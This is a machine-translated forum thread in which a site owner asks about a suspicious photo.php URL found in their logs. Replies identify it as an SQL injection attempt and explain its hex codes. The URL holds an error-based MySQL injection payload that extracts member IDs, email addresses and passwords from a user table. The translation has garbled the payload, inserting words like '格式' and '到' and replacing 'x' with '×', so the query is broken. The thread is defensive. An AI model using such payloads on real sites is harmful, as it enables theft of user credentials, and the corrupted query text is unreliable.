2
我在日誌中反覆看到一個奇怪的url,我想知道是否有人能夠理解這個用戶試圖做什麼。我有點熟悉MySQL的基礎知識,但是,我迷失了這個(尤其是0x7e部分),並且想要防止未來可能發生的漏洞。我發現並正在更正腳本中的漏洞,但我真的很想知道此人在做什麼。任何你可以提供的洞察力將不勝感激。謝謝。可能的SQL注入?發生了什麼?
注意:我用下面的DatabaseName.TableName替換了我的實際數據庫和表名,使其更清晰。
這裏的怪異網址:
photo.php member_id = 11616%27 +和+(SELECT + 7509 + FROM(SELECT + COUNT(*),CONCAT(0x7e格式,到0x7e,0x7e格式,0×27, (SELECT + CONCAT(MID((IFNULL(CAST(member_id + AS + CHAR),0×20)),1,50),0x3A,MID((IFNULL(CAST(EMAIL_ADDRESS + AS + CHAR),0×20)),1, 50),0x3A,MID((IFNULL(CAST(密碼+ AS + CHAR),0×20)),1,50))+ FROM + DatabaseName.TableName + ORDER BY + + + member_id LIMIT + 81947,1),0×27, 0x7e格式,FLOOR(RAND(0)* 2))×+ FROM + INFORMATION_SCHEMA.CHARACTER_SETS + GROUP BY + + x)的一個)+和+%27FtCw%27 =%27FtCw &名稱= 1392855.jpg
的http:// stackoverflow.com/questions/4600954/site-has-been-hacked-via-sql-injection –
'0x7E'是'〜'的ASCII字符代碼,'0x27'是''','0x20'是一個空格字符,'0x3A'是':'。見[ASCII表格](http://en.wikipedia.org/wiki/ASCII)。是的,這是一次SQL注入嘗試。 –
我建議立即禁用這個網絡應用程序,並且不要將其重新啓用,直到您確定它不容易受到攻擊。 – Craig